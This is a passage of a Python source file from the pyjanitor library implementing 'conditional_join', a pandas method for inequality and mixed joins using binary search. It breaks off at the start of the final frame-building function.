janitor/functions/conditional_join.py
|
aliavni/pyjanitor
|
245012443d01247a591fd0e931b154c7a12a9753
|
[
"MIT"
] | null | null | null |
janitor/functions/conditional_join.py
|
aliavni/pyjanitor
|
245012443d01247a591fd0e931b154c7a12a9753
|
[
"MIT"
] | null | null | null |
janitor/functions/conditional_join.py
|
aliavni/pyjanitor
|
245012443d01247a591fd0e931b154c7a12a9753
|
[
"MIT"
] | null | null | null |
import operator
from enum import Enum
from typing import Union, Any, Optional, Hashable
import numpy as np
import pandas as pd
import pandas_flavor as pf
from pandas.core.construction import extract_array
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_datetime64_dtype,
is_dtype_equal,
is_extension_array_dtype,
is_numeric_dtype,
is_string_dtype,
)
from pandas.core.reshape.merge import _MergeOperation
from janitor.utils import check, check_column
@pf.register_dataframe_method
def conditional_join(
df: pd.DataFrame,
right: Union[pd.DataFrame, pd.Series],
*conditions,
how: str = "inner",
sort_by_appearance: bool = False,
df_columns: Optional[Any] = None,
right_columns: Optional[Any] = None,
) -> pd.DataFrame:
"""
This is a convenience function that operates similarly to `pd.merge`,
but allows joins on inequality operators,
or a combination of equi and non-equi joins.
Join solely on equality are not supported.
If the join is solely on equality, `pd.merge` function
covers that; if you are interested in nearest joins, or rolling joins,
or the first match (lowest or highest) - `pd.merge_asof` covers that.
There is also the IntervalIndex, which is usually more efficient
for range joins, especially if the intervals do not overlap.
Column selection in `df_columns` and `right_columns` is possible using the
[`select_columns`][janitor.functions.select_columns.select_columns] syntax.
This function returns rows, if any, where values from `df` meet the
condition(s) for values from `right`. The conditions are passed in
as a variable argument of tuples, where the tuple is of
the form `(left_on, right_on, op)`; `left_on` is the column
label from `df`, `right_on` is the column label from `right`,
while `op` is the operator. For multiple conditions, the and(`&`)
operator is used to combine the results of the individual conditions.
The operator can be any of `==`, `!=`, `<=`, `<`, `>=`, `>`.
A binary search is used to get the relevant rows for non-equi joins;
this avoids a cartesian join, and makes the process less memory intensive.
For equi-joins, Pandas internal merge function is used.
The join is done only on the columns.
MultiIndex columns are not supported.
For non-equi joins, only numeric and date columns are supported.
Only `inner`, `left`, and `right` joins are supported.
If the columns from `df` and `right` have nothing in common,
a single index column is returned; else, a MultiIndex column
is returned.
Example:
>>> import pandas as pd
>>> import janitor
>>> df1 = pd.DataFrame({"value_1": [2, 5, 7, 1, 3, 4]})
>>> df2 = pd.DataFrame({"value_2A": [0, 3, 7, 12, 0, 2, 3, 1],
... "value_2B": [1, 5, 9, 15, 1, 4, 6, 3],
... })
>>> df1
value_1
0 2
1 5
2 7
3 1
4 3
5 4
>>> df2
value_2A value_2B
0 0 1
1 3 5
2 7 9
3 12 15
4 0 1
5 2 4
6 3 6
7 1 3
>>> df1.conditional_join(
... df2,
... ("value_1", "value_2A", ">="),
... ("value_1", "value_2B", "<=")
... )
value_1 value_2A value_2B
0 2 1 3
1 2 2 4
2 5 3 5
3 5 3 6
4 7 7 9
5 1 0 1
6 1 0 1
7 1 1 3
8 3 1 3
9 3 2 4
10 3 3 5
11 3 3 6
12 4 2 4
13 4 3 5
14 4 3 6
:param df: A pandas DataFrame.
:param right: Named Series or DataFrame to join to.
:param conditions: Variable argument of tuple(s) of the form
`(left_on, right_on, op)`, where `left_on` is the column
label from `df`, `right_on` is the column label from `right`,
while `op` is the operator. The operator can be any of
`==`, `!=`, `<=`, `<`, `>=`, `>`. For multiple conditions,
the and(`&`) operator is used to combine the results
of the individual conditions.
:param how: Indicates the type of join to be performed.
It can be one of `inner`, `left`, `right`.
Full join is not supported. Defaults to `inner`.
:param sort_by_appearance: Default is `False`.
This is useful for strictly non-equi joins,
where the user wants the original order maintained.
If True, values from `df` and `right`
that meet the join condition will be returned
in the final dataframe in the same order
that they were before the join.
:param df_columns: Columns to select from `df`.
It can be a single column or a list of columns.
It is also possible to rename the output columns via a dictionary.
:param right_columns: Columns to select from `right`.
It can be a single column or a list of columns.
It is also possible to rename the output columns via a dictionary.
:returns: A pandas DataFrame of the two merged Pandas objects.
"""
return _conditional_join_compute(
df,
right,
conditions,
how,
sort_by_appearance,
df_columns,
right_columns,
)
class _JoinOperator(Enum):
"""
List of operators used in conditional_join.
"""
GREATER_THAN = ">"
LESS_THAN = "<"
GREATER_THAN_OR_EQUAL = ">="
LESS_THAN_OR_EQUAL = "<="
STRICTLY_EQUAL = "=="
NOT_EQUAL = "!="
class _JoinTypes(Enum):
"""
List of join types for conditional_join.
"""
INNER = "inner"
LEFT = "left"
RIGHT = "right"
operator_map = {
_JoinOperator.STRICTLY_EQUAL.value: operator.eq,
_JoinOperator.LESS_THAN.value: operator.lt,
_JoinOperator.LESS_THAN_OR_EQUAL.value: operator.le,
_JoinOperator.GREATER_THAN.value: operator.gt,
_JoinOperator.GREATER_THAN_OR_EQUAL.value: operator.ge,
_JoinOperator.NOT_EQUAL.value: operator.ne,
}
less_than_join_types = {
_JoinOperator.LESS_THAN.value,
_JoinOperator.LESS_THAN_OR_EQUAL.value,
}
greater_than_join_types = {
_JoinOperator.GREATER_THAN.value,
_JoinOperator.GREATER_THAN_OR_EQUAL.value,
}
def _check_operator(op: str):
"""
Check that operator is one of
`>`, `>=`, `==`, `!=`, `<`, `<=`.
Used in `conditional_join`.
"""
sequence_of_operators = {op.value for op in _JoinOperator}
if op not in sequence_of_operators:
raise ValueError(
"The conditional join operator "
f"should be one of {sequence_of_operators}"
)
def _conditional_join_preliminary_checks(
df: pd.DataFrame,
right: Union[pd.DataFrame, pd.Series],
conditions: tuple,
how: str,
sort_by_appearance: bool,
df_columns: Any,
right_columns: Any,
) -> tuple:
"""
Preliminary checks for conditional_join are conducted here.
Checks include differences in number of column levels,
length of conditions, existence of columns in dataframe, etc.
"""
check("right", right, [pd.DataFrame, pd.Series])
df = df.copy()
right = right.copy()
if isinstance(right, pd.Series):
if not right.name:
raise ValueError(
"Unnamed Series are not supported for conditional_join."
)
right = right.to_frame()
if df.columns.nlevels != right.columns.nlevels:
raise ValueError(
"The number of column levels "
"from the left and right frames must match. "
"The number of column levels from the left dataframe "
f"is {df.columns.nlevels}, while the number of column levels "
f"from the right dataframe is {right.columns.nlevels}."
)
if not conditions:
raise ValueError("Kindly provide at least one join condition.")
for condition in conditions:
check("condition", condition, [tuple])
len_condition = len(condition)
if len_condition != 3:
raise ValueError(
"condition should have only three elements; "
f"{condition} however is of length {len_condition}."
)
for left_on, right_on, op in conditions:
check("left_on", left_on, [Hashable])
check("right_on", right_on, [Hashable])
check("operator", op, [str])
check_column(df, [left_on])
check_column(right, [right_on])
_check_operator(op)
if all(
(op == _JoinOperator.STRICTLY_EQUAL.value for *_, op in conditions)
):
raise ValueError("Equality only joins are not supported.")
check("how", how, [str])
checker = {jointype.value for jointype in _JoinTypes}
if how not in checker:
raise ValueError(f"'how' should be one of {checker}.")
check("sort_by_appearance", sort_by_appearance, [bool])
if (df.columns.nlevels > 1) and (
isinstance(df_columns, dict) or isinstance(right_columns, dict)
):
raise ValueError(
"Column renaming with a dictionary is not supported "
"for MultiIndex columns."
)
return (
df,
right,
conditions,
how,
sort_by_appearance,
df_columns,
right_columns,
)
def _conditional_join_type_check(
left_column: pd.Series, right_column: pd.Series, op: str
) -> None:
"""
Raise error if column type is not any of numeric or datetime or string.
"""
permitted_types = {
is_datetime64_dtype,
is_numeric_dtype,
is_string_dtype,
is_categorical_dtype,
}
for func in permitted_types:
if func(left_column):
break
else:
raise ValueError(
"conditional_join only supports "
"string, category, numeric, or date dtypes (without timezone) - "
f"'{left_column.name} is of type {left_column.dtype}."
)
lk_is_cat = is_categorical_dtype(left_column)
rk_is_cat = is_categorical_dtype(right_column)
if lk_is_cat & rk_is_cat:
if not left_column.array._categories_match_up_to_permutation(
right_column.array
):
raise ValueError(
f"'{left_column.name}' and '{right_column.name}' "
"should have the same categories, and the same order."
)
elif not is_dtype_equal(left_column, right_column):
raise ValueError(
f"Both columns should have the same type - "
f"'{left_column.name}' has {left_column.dtype} type;"
f"'{right_column.name}' has {right_column.dtype} type."
)
if (op in less_than_join_types.union(greater_than_join_types)) & (
(is_string_dtype(left_column) | is_categorical_dtype(left_column))
):
raise ValueError(
"non-equi joins are supported "
"only for datetime and numeric dtypes. "
f"{left_column.name} in condition "
f"({left_column.name}, {right_column.name}, {op}) "
f"has a dtype {left_column.dtype}."
)
return None
def _conditional_join_compute(
df: pd.DataFrame,
right: pd.DataFrame,
conditions: list,
how: str,
sort_by_appearance: bool,
df_columns: Any,
right_columns: Any,
) -> pd.DataFrame:
"""
This is where the actual computation
for the conditional join takes place.
A pandas DataFrame is returned.
"""
(
df,
right,
conditions,
how,
sort_by_appearance,
df_columns,
right_columns,
) = _conditional_join_preliminary_checks(
df,
right,
conditions,
how,
sort_by_appearance,
df_columns,
right_columns,
)
eq_check = False
le_lt_check = False
for condition in conditions:
left_on, right_on, op = condition
_conditional_join_type_check(df[left_on], right[right_on], op)
if op == _JoinOperator.STRICTLY_EQUAL.value:
eq_check = True
elif op in less_than_join_types.union(greater_than_join_types):
le_lt_check = True
df.index = range(len(df))
right.index = range(len(right))
multiple_conditions = len(conditions) > 1
if not multiple_conditions:
left_on, right_on, op = conditions[0]
result = _generic_func_cond_join(
df[left_on], right[right_on], op, multiple_conditions
)
if result is None:
return _create_conditional_join_empty_frame(
df, right, how, df_columns, right_columns
)
return _create_conditional_join_frame(
df,
right,
*result,
how,
sort_by_appearance,
df_columns,
right_columns,
)
if eq_check:
result = _multiple_conditional_join_eq(df, right, conditions)
elif le_lt_check:
result = _multiple_conditional_join_le_lt(df, right, conditions)
else:
result = _multiple_conditional_join_ne(df, right, conditions)
if result is None:
return _create_conditional_join_empty_frame(
df, right, how, df_columns, right_columns
)
return _create_conditional_join_frame(
df, right, *result, how, sort_by_appearance, df_columns, right_columns
)
def _less_than_indices(
left_c: pd.Series,
right_c: pd.Series,
strict: bool,
) -> tuple:
"""
Use binary search to get indices where left_c
is less than or equal to right_c.
If strict is True, then only indices
where `left_c` is less than
(but not equal to) `right_c` are returned.
A tuple of integer indexes
for left_c and right_c is returned.
"""
# no point going through all the hassle
if left_c.min() > right_c.max():
return None
any_nulls = pd.isna(right_c)
if any_nulls.any():
right_c = right_c[~any_nulls]
if right_c.empty:
return None
any_nulls = pd.isna(left_c)
if any_nulls.any():
left_c = left_c[~any_nulls]
if left_c.empty:
return None
any_nulls = None
if not right_c.is_monotonic_increasing:
right_c = right_c.sort_values(kind="stable")
left_index = left_c.index.to_numpy(dtype=int, copy=False)
left_c = extract_array(left_c, extract_numpy=True)
right_index = right_c.index.to_numpy(dtype=int, copy=False)
right_c = extract_array(right_c, extract_numpy=True)
search_indices = right_c.searchsorted(left_c, side="left")
# if any of the positions in `search_indices`
# is equal to the length of `right_keys`
# that means the respective position in `left_c`
# has no values from `right_c` that are less than
# or equal, and should therefore be discarded
len_right = right_c.size
rows_equal = search_indices == len_right
if rows_equal.any():
left_c = left_c[~rows_equal]
left_index = left_index[~rows_equal]
search_indices = search_indices[~rows_equal]
# the idea here is that if there are any equal values
# shift to the right to the immediate next position
# that is not equal
if strict:
rows_equal = right_c[search_indices]
rows_equal = left_c == rows_equal
# replace positions where rows are equal
# with positions from searchsorted('right')
# positions from searchsorted('right') will never
# be equal and will be the furthermost in terms of position
# example : right_c -> [2, 2, 2, 3], and we need
# positions where values are not equal for 2;
# the furthermost will be 3, and searchsorted('right')
# will return position 3.
if rows_equal.any():
replacements = right_c.searchsorted(left_c, side="right")
# now we can safely replace values
# with strictly less than positions
search_indices = np.where(rows_equal, replacements, search_indices)
# check again if any of the values
# have become equal to length of right_c
# and get rid of them
rows_equal = search_indices == len_right
if rows_equal.any():
left_c = left_c[~rows_equal]
left_index = left_index[~rows_equal]
search_indices = search_indices[~rows_equal]
if not search_indices.size:
return None
right_c = [right_index[ind:len_right] for ind in search_indices]
right_c = np.concatenate(right_c)
left_c = np.repeat(left_index, len_right - search_indices)
return left_c, right_c
def _greater_than_indices(
left_c: pd.Series,
right_c: pd.Series,
strict: bool,
multiple_conditions: bool,
) -> tuple:
"""
Use binary search to get indices where left_c
is greater than or equal to right_c.
If strict is True, then only indices
where `left_c` is greater than
(but not equal to) `right_c` are returned.
if multiple_conditions is False, a tuple of integer indexes
for left_c and right_c is returned;
else a tuple of the index for left_c, right_c, as well
as the positions of left_c in right_c is returned.
"""
# quick break, avoiding the hassle
if left_c.max() < right_c.min():
return None
any_nulls = pd.isna(right_c)
if any_nulls.any():
right_c = right_c[~any_nulls]
if right_c.empty:
return None
any_nulls = pd.isna(left_c)
if any_nulls.any():
left_c = left_c[~any_nulls]
if left_c.empty:
return None
any_nulls = None
if not right_c.is_monotonic_increasing:
right_c = right_c.sort_values(kind="stable")
left_index = left_c.index.to_numpy(dtype=int, copy=False)
left_c = extract_array(left_c, extract_numpy=True)
right_index = right_c.index.to_numpy(dtype=int, copy=False)
right_c = extract_array(right_c, extract_numpy=True)
search_indices = right_c.searchsorted(left_c, side="right")
# if any of the positions in `search_indices`
# is equal to 0 (less than 1), it implies that
# left_c[position] is not greater than any value
# in right_c
rows_equal = search_indices < 1
if rows_equal.any():
left_c = left_c[~rows_equal]
left_index = left_index[~rows_equal]
search_indices = search_indices[~rows_equal]
# the idea here is that if there are any equal values
# shift downwards to the immediate next position
# that is not equal
if strict:
rows_equal = right_c[search_indices - 1]
rows_equal = left_c == rows_equal
# replace positions where rows are equal with
# searchsorted('left');
# however there can be scenarios where positions
# from searchsorted('left') would still be equal;
# in that case, we shift down by 1
if rows_equal.any():
replacements = right_c.searchsorted(left_c, side="left")
# return replacements
# `left` might result in values equal to len right_c
replacements = np.where(
replacements == right_c.size, replacements - 1, replacements
)
# now we can safely replace values
# with strictly greater than positions
search_indices = np.where(rows_equal, replacements, search_indices)
# any value less than 1 should be discarded
# since the lowest value for binary search
# with side='right' should be 1
rows_equal = search_indices < 1
if rows_equal.any():
left_c = left_c[~rows_equal]
left_index = left_index[~rows_equal]
search_indices = search_indices[~rows_equal]
if not search_indices.size:
return None
if multiple_conditions:
return left_index, right_index, search_indices
right_c = [right_index[:ind] for ind in search_indices]
right_c = np.concatenate(right_c)
left_c = np.repeat(left_index, search_indices)
return left_c, right_c
def _not_equal_indices(left_c: pd.Series, right_c: pd.Series) -> tuple:
"""
Use binary search to get indices where
`left_c` is exactly not equal to `right_c`.
It is a combination of strictly less than
and strictly greater than indices.
A tuple of integer indexes for left_c and right_c
is returned.
"""
dummy = np.array([], dtype=int)
# deal with nulls
l1_nulls = dummy
r1_nulls = dummy
l2_nulls = dummy
r2_nulls = dummy
any_left_nulls = left_c.isna()
any_right_nulls = right_c.isna()
if any_left_nulls.any():
l1_nulls = left_c.index[any_left_nulls.array]
l1_nulls = l1_nulls.to_numpy(copy=False)
r1_nulls = right_c.index
# avoid NAN duplicates
if any_right_nulls.any():
r1_nulls = r1_nulls[~any_right_nulls.array]
r1_nulls = r1_nulls.to_numpy(copy=False)
nulls_count = l1_nulls.size
# blow up nulls to match length of right
l1_nulls = np.tile(l1_nulls, r1_nulls.size)
# ensure length of right matches left
if nulls_count > 1:
r1_nulls = np.repeat(r1_nulls, nulls_count)
if any_right_nulls.any():
r2_nulls = right_c.index[any_right_nulls.array]
r2_nulls = r2_nulls.to_numpy(copy=False)
l2_nulls = left_c.index
nulls_count = r2_nulls.size
# blow up nulls to match length of left
r2_nulls = np.tile(r2_nulls, l2_nulls.size)
# ensure length of left matches right
if nulls_count > 1:
l2_nulls = np.repeat(l2_nulls, nulls_count)
l1_nulls = np.concatenate([l1_nulls, l2_nulls])
r1_nulls = np.concatenate([r1_nulls, r2_nulls])
outcome = _less_than_indices(left_c, right_c, strict=True)
if outcome is None:
lt_left = dummy
lt_right = dummy
else:
lt_left, lt_right = outcome
outcome = _greater_than_indices(
left_c, right_c, strict=True, multiple_conditions=False
)
if outcome is None:
gt_left = dummy
gt_right = dummy
else:
gt_left, gt_right = outcome
left_c = np.concatenate([lt_left, gt_left, l1_nulls])
right_c = np.concatenate([lt_right, gt_right, r1_nulls])
if (not left_c.size) & (not right_c.size):
return None
return left_c, right_c
def _eq_indices(
left_c: pd.Series,
right_c: pd.Series,
) -> tuple:
"""
Use binary search to get indices where left_c
is equal to right_c.
Returns a tuple of the left_index, right_index,
lower_boundary and upper_boundary.
"""
# no point going through all the hassle
if left_c.min() > right_c.max():
return None
if left_c.max() < right_c.min():
return None
any_nulls = pd.isna(right_c)
if any_nulls.any():
right_c = right_c[~any_nulls]
if right_c.empty:
return None
any_nulls = pd.isna(left_c)
if any_nulls.any():
left_c = left_c[~any_nulls]
if left_c.empty:
return None
any_nulls = None
if not right_c.is_monotonic_increasing:
right_c = right_c.sort_values(kind="stable")
left_index = left_c.index.to_numpy(dtype=int, copy=False)
left_c = extract_array(left_c, extract_numpy=True)
right_index = right_c.index.to_numpy(dtype=int, copy=False)
right_c = extract_array(right_c, extract_numpy=True)
lower_boundary = right_c.searchsorted(left_c, side="left")
upper_boundary = right_c.searchsorted(left_c, side="right")
keep_rows = lower_boundary < upper_boundary
if not keep_rows.any():
return None
if not keep_rows.all():
left_index = left_index[keep_rows]
lower_boundary = lower_boundary[keep_rows]
upper_boundary = upper_boundary[keep_rows]
return left_index, right_index, lower_boundary, upper_boundary
def _generic_func_cond_join(
left_c: pd.Series,
right_c: pd.Series,
op: str,
multiple_conditions: bool,
) -> tuple:
"""
Generic function to call any of the individual functions
(_less_than_indices, _greater_than_indices,
or _not_equal_indices).
"""
strict = False
if op in {
_JoinOperator.GREATER_THAN.value,
_JoinOperator.LESS_THAN.value,
_JoinOperator.NOT_EQUAL.value,
}:
strict = True
if op in less_than_join_types:
return _less_than_indices(left_c, right_c, strict)
elif op in greater_than_join_types:
return _greater_than_indices(
left_c, right_c, strict, multiple_conditions
)
elif op == _JoinOperator.NOT_EQUAL.value:
return _not_equal_indices(left_c, right_c)
def _generate_indices(
left_index: np.ndarray, right_index: np.ndarray, conditions: list
) -> tuple:
"""
Run a for loop to get the final indices.
This iteratively goes through each condition,
builds a boolean array,
and gets indices for rows that meet the condition requirements.
`conditions` is a list of tuples, where a tuple is of the form:
`(Series from df, Series from right, operator)`.
"""
for condition in conditions:
left_c, right_c, op = condition
left_c = extract_array(left_c, extract_numpy=True)[left_index]
right_c = extract_array(right_c, extract_numpy=True)[right_index]
op = operator_map[op]
mask = op(left_c, right_c)
if not mask.any():
return None
if is_extension_array_dtype(mask):
mask = mask.to_numpy(dtype=bool, na_value=False)
if not mask.all():
left_index = left_index[mask]
right_index = right_index[mask]
return left_index, right_index
def _multiple_conditional_join_ne(
df: pd.DataFrame, right: pd.DataFrame, conditions: list
) -> tuple:
"""
Get indices for multiple conditions,
where all the operators are `!=`.
Returns a tuple of (left_index, right_index)
"""
# currently, there is no optimization option here
# not equal typically combines less than
# and greater than, so a lot more rows are returned
# than just less than or greater than
# here we get indices for the first condition in conditions
# then use those indices to get the final indices,
# using _generate_indices
first, *rest = conditions
left_on, right_on, op = first
# get indices from the first condition
result = _generic_func_cond_join(
df[left_on], right[right_on], op, multiple_conditions=False
)
if result is None:
return None
rest = (
(df[left_on], right[right_on], op) for left_on, right_on, op in rest
)
return _generate_indices(*result, rest)
def _multiple_conditional_join_eq(
df: pd.DataFrame, right: pd.DataFrame, conditions: list
) -> tuple:
"""
Get indices for multiple conditions,
if any of the conditions has an `==` operator.
Returns a tuple of (df_index, right_index)
"""
# TODO
# this uses the idea in the `_range_indices` function
# for less than and greater than;
# I'd like to believe there is a smarter/more efficient way of doing this
# where the filter occurs within the join, and avoids a blow-up
# the current implementation uses
# a list comprehension to find first matches
# in a bid to reduce the blow up size ...
# this applies only to integers/dates
# and only offers advantages in scenarios
# where the right is duplicated
# for one to many joins,
# or one to one or strings/category, use merge
# as it is significantly faster than a binary search
eqs = [
(left_on, right_on)
for left_on, right_on, op in conditions
if op == _JoinOperator.STRICTLY_EQUAL.value
]
left_on, right_on = zip(*eqs)
left_on = [*left_on]
right_on = [*right_on]
strings_or_category = any(
col
for col in left_on
if (is_string_dtype(df[col]) | is_categorical_dtype(df[col]))
)
if (
strings_or_category
| (not right.duplicated(subset=right_on).any(axis=None))
| (not df.duplicated(subset=left_on).any(axis=None))
):
rest = (
(df[left_on], right[right_on], op)
for left_on, right_on, op in conditions
if op != _JoinOperator.STRICTLY_EQUAL.value
)
left_index, right_index = _MergeOperation(
df,
right,
left_on=left_on,
right_on=right_on,
sort=False,
copy=False,
)._get_join_indexers()
if not left_index.size:
return None
return _generate_indices(left_index, right_index, rest)
left_on, right_on = eqs[0]
outcome = _eq_indices(df[left_on], right[right_on])
if not outcome:
return None
left_index, right_index, lower_boundary, upper_boundary = outcome
eq_check = [condition for condition in conditions if condition != eqs[0]]
rest = [
(df.loc[left_index, left_on], right.loc[right_index, right_on], op)
for left_on, right_on, op in eq_check
]
rest = [
(
extract_array(left_c, extract_numpy=True),
extract_array(right_c, extract_numpy=True),
operator_map[op],
)
for left_c, right_c, op in rest
]
def _extension_array_check(arr):
"""
Convert boolean array to numpy array
if it is an extension array.
"""
if is_extension_array_dtype(arr):
return arr.to_numpy(dtype=bool, na_value=False, copy=False)
return arr
pos = np.copy(upper_boundary)
upper = np.copy(upper_boundary)
counter = np.arange(left_index.size)
# faster within C/Rust? better implemented within Pandas itself?
# the idea here is that lower_boundary moves up by 1
# till it gets to upper_boundary;
# if we get all our matches before the end of the iteration, even better
for _ in range((upper_boundary - lower_boundary).max()):
if not counter.size:
break
if (lower_boundary == upper).any():
keep_rows = lower_boundary < upper
rest = [
(left_c[keep_rows], right_c, op)
for left_c, right_c, op in rest
]
lower_boundary = lower_boundary[keep_rows]
upper = upper[keep_rows]
counter = counter[keep_rows]
keep_rows = [
op(left_c, right_c[lower_boundary]) for left_c, right_c, op in rest
]
keep_rows = [_extension_array_check(arr) for arr in keep_rows]
keep_rows = np.logical_and.reduce(keep_rows)
if not keep_rows.any():
lower_boundary += 1
continue
pos[counter[keep_rows]] = lower_boundary[keep_rows]
counter = counter[~keep_rows]
rest = [
(left_c[~keep_rows], right_c, op) for left_c, right_c, op in rest
]
upper = upper[~keep_rows]
lower_boundary = lower_boundary[~keep_rows]
lower_boundary += 1
keep_rows = pos < upper_boundary
if not keep_rows.any():
return None
if not keep_rows.all():
left_index = left_index[keep_rows]
pos = pos[keep_rows]
upper_boundary = upper_boundary[keep_rows]
repeater = upper_boundary - pos
right_index = [
right_index[start:end] for start, end in zip(pos, upper_boundary)
]
right_index = np.concatenate(right_index)
left_index = np.repeat(left_index, repeater)
eq_check = [
(df[left_on], right[right_on], op)
for left_on, right_on, op in eq_check
]
return _generate_indices(left_index, right_index, eq_check)
def _multiple_conditional_join_le_lt(
df: pd.DataFrame, right: pd.DataFrame, conditions: list
) -> tuple:
"""
Get indices for multiple conditions,
where `>/>=` or `</<=` is present,
and there is no `==` operator.
Returns a tuple of (df_index, right_index)
"""
# there is an opportunity for optimization for range joins
# which is usually `lower_value < value < upper_value`
# or `lower_value < a` and `b < upper_value`
# intervalindex is not used here, as there are scenarios
# where there will be overlapping intervals;
# intervalindex does not offer an efficient way to get
# the indices for overlaps
# also, intervalindex covers only the first option
# i.e => `lower_value < value < upper_value`
# it does not extend to range joins for different columns
# i.e => `lower_value < a` and `b < upper_value`
# the option used for range joins is a simple form
# dependent on sorting and extensible to overlaps
# as well as the second option:
# i.e =>`lower_value < a` and `b < upper_value`
# range joins are also the more common types of non-equi joins
# the other joins do not have an optimisation opportunity
# as far as I know, so a blowup of all the rows
# is unavoidable.
# future PR could use numba to improve performance, although it
# still doesn't help that an optimisation path is not available
# that I am aware of
# first step is to get two conditions, if possible
# where one has a less than operator
# and the other has a greater than operator
# get the indices from that
# and then build the remaining indices,
# using _generate_indices function
# the aim of this for loop is to see if there is
# the possiblity of a range join, and if there is
# use the optimised path
le_lt = None
ge_gt = None
# keep the first match for le_lt or ge_gt
for condition in conditions:
*_, op = condition
if op in less_than_join_types:
if le_lt:
continue
le_lt = condition
elif op in greater_than_join_types:
if ge_gt:
continue
ge_gt = condition
if le_lt and ge_gt:
break
# optimised path
if le_lt and ge_gt:
rest = [
condition
for condition in conditions
if condition not in (ge_gt, le_lt)
]
if rest:
rest = (
(df[left_on], right[right_on], op)
for left_on, right_on, op in rest
)
else:
rest = None
return _range_indices(df, right, ge_gt, le_lt, rest)
# no optimised path
# blow up the rows and prune
if le_lt:
conditions = (
condition for condition in conditions if condition != le_lt
)
conditions = (
(df[left_on], right[right_on], op)
for left_on, right_on, op in conditions
)
left_on, right_on, op = le_lt
outcome = _generic_func_cond_join(
df[left_on],
right[right_on],
op,
multiple_conditions=False,
)
if outcome is None:
return None
return _generate_indices(*outcome, conditions)
# no optimised path
# blow up the rows and prune
if ge_gt:
conditions = (
condition for condition in conditions if condition != ge_gt
)
conditions = (
(df[left_on], right[right_on], op)
for left_on, right_on, op in conditions
)
left_on, right_on, op = ge_gt
outcome = _generic_func_cond_join(
df[left_on],
right[right_on],
op,
multiple_conditions=False,
)
if outcome is None:
return None
return _generate_indices(*outcome, conditions)
def _range_indices(
df: pd.DataFrame,
right: pd.DataFrame,
first: tuple,
second: tuple,
rest: tuple = None,
):
"""
Retrieve index positions for range/interval joins.
Idea inspired by article:
https://www.vertica.com/blog/what-is-a-range-join-and-why-is-it-so-fastba-p223413/
Returns a tuple of (left_index, right_index)
"""
# summary of code for range join:
# get the positions where start_left is >/>= start_right
# then within the positions,
# get the positions where end_left is </<= end_right
# this should reduce the search space
left_on, right_on, op = first
strict = False
if op == _JoinOperator.GREATER_THAN.value:
strict = True
outcome = _greater_than_indices(
df[left_on],
right[right_on],
strict,
multiple_conditions=True,
)
if outcome is None:
return None
left_index, right_index, search_indices = outcome
left_on, right_on, op = second
right_c = right.loc[right_index, right_on]
left_c = df.loc[left_index, left_on]
left_c = extract_array(left_c, extract_numpy=True)
op = operator_map[op]
pos = np.copy(search_indices)
counter = np.arange(left_index.size)
ext_arr = is_extension_array_dtype(left_c)
dupes = right_c.duplicated(keep="first")
right_c = extract_array(right_c, extract_numpy=True)
# use position, not label
uniqs_index = np.arange(right_c.size)
if dupes.any():
uniqs_index = uniqs_index[~dupes]
right_c = right_c[~dupes]
for ind in range(uniqs_index.size):
if not counter.size:
break
keep_rows = op(left_c, right_c[ind])
if ext_arr:
keep_rows = keep_rows.to_numpy(
dtype=bool, na_value=False, copy=False
)
if not keep_rows.any():
continue
# get the index positions where left_c is </<= right_c
# that minimum position combined with the equivalent position
# from search_indices becomes our search space
# for the equivalent left_c index
pos[counter[keep_rows]] = uniqs_index[ind]
counter = counter[~keep_rows]
left_c = left_c[~keep_rows]
dupes = None
uniqs_index = None
# no point searching within (a, b)
# if a == b
# since range(a, b) yields none
keep_rows = pos < search_indices
if not keep_rows.any():
return None
if not keep_rows.all():
left_index = left_index[keep_rows]
pos = pos[keep_rows]
search_indices = search_indices[keep_rows]
repeater = search_indices - pos
right_index = [
right_index[start:end] for start, end in zip(pos, search_indices)
]
# get indices and filter to get exact indices
# that meet the condition
right_index = np.concatenate(right_index)
left_index = np.repeat(left_index, repeater)
# here we search for actual positions
# where left_c is </<= right_c
# safe to index the arrays, since we are picking the positions
# which are all in the original `df` and `right`
# doing this allows some speed gains
# while still ensuring correctness
left_c = extract_array(df[left_on], extract_numpy=True)[left_index]
right_c = extract_array(right[right_on], extract_numpy=True)[right_index]
mask = op(left_c, right_c)
if ext_arr:
mask = mask.to_numpy(dtype=bool, na_value=False)
if not mask.all():
left_index = left_index[mask]
right_index = right_index[mask]
if not rest:
return left_index, right_index
return _generate_indices(left_index, right_index, rest)
def _cond_join_select_columns(columns: Any, df: pd.DataFrame):
"""
Select and/or rename columns in a DataFrame.
Returns a Pandas DataFrame.
"""
df = df.select_columns(columns)
if isinstance(columns, dict):
df.columns = [columns.get(name, name) for name in df]
return df
def _create_multiindex_column(df: pd.DataFrame, right: pd.DataFrame):
"""
Create a MultiIndex column for conditional_join.
"""
header = [np.array(["left"]).repeat(df.columns.size)]
columns = [
df.columns.get_level_values(n) for n in range(df.columns.nlevels)
]
header.extend(columns)
df.columns = pd.MultiIndex.from_arrays(header)
header = [np.array(["right"]).repeat(right.columns.size)]
columns = [
right.columns.get_level_values(n) for n in range(right.columns.nlevels)
]
header.extend(columns)
right.columns = pd.MultiIndex.from_arrays(header)
header = None
return df, right
def _create_conditional_join_empty_frame(
df: pd.DataFrame,
right: pd.DataFrame,
how: str,
df_columns: Any,
right_columns: Any,
):
"""
Create final dataframe for conditional join,
if there are no matches.
"""
if df_columns:
df = _cond_join_select_columns(df_columns, df)
if right_columns:
right = _cond_join_select_columns(right_columns, right)
if set(df.columns).intersection(right.columns):
df, right = _create_multiindex_column(df, right)
if how == _JoinTypes.INNER.value:
df = df.dtypes.to_dict()
right = right.dtypes.to_dict()
df = {**df, **right}
df = {key: pd.Series([], dtype=value) for key, value in df.items()}
return pd.DataFrame(df, copy=False)
if how == _JoinTypes.LEFT.value:
right = right.dtypes.to_dict()
right = {
key: float if dtype.kind == "i" else dtype
for key, dtype in right.items()
}
right = {
key: pd.Series([], dtype=value) for key, value in right.items()
}
right = pd.DataFrame(right, copy=False)
else: # how == 'right'
df = df.dtypes.to_dict()
df = {
key: float if dtype.kind == "i" else dtype
for key, dtype in df.items()
}
df = {key: pd.Series([], dtype=value) for key, value in df.items()}
df = pd.DataFrame(df, copy=False)
df = pd.merge(
df,
right,
left_index=True,
right_index=True,
how=how,
copy=False,
sort=False,
)
df.index = range(len(df))
return df
def _create_conditional_join_frame(
df: pd.DataFrame,
right: pd.DataFrame,
left_index: np.ndarray,
right_index: np.ndarray,
how: str,
sort_by_appearance: bool,
df_columns: Any,
right_columns: Any,
):
"""
Create final dataframe for conditional join,
if there are matches.
"""
